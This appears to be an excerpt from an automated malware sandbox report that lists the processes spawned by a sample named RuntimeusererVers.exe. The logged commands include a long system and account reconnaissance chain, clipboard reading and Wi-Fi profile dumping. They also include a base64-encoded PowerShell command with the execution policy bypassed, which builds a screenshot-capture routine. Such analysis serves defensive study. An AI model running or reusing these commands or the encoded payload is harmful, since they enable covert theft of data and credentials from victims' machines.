                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
                      Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bjhgmex2\bjhgmex2.cmdline"
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6BB9.tmp" "c:\Users\user\AppData\Local\Temp\bjhgmex2\CSC140859705554C19BC8B0399D26A87.TMP"
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_6064_133761375925415069\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                      Source: C:\Users\user\Desktop\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe "C:\Users\user\Desktop\RuntimeusererVers.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcpJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcpJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-ClipboardJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfoJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostnameJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net userJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query userJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroupJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administratorsJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guestJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administratorJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svcJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /allJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route printJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -aJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -anoJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= allJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show stateJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show configJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 userJump to behavior
                      Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"Jump to behavior
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroupJump to behavior
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
                      Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
                      Source: C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exe "C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe"
                      Source: C:\Users\user\AppData\Local\Temp\onefile_2956_133761375843672108\RuntimeusererVers.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
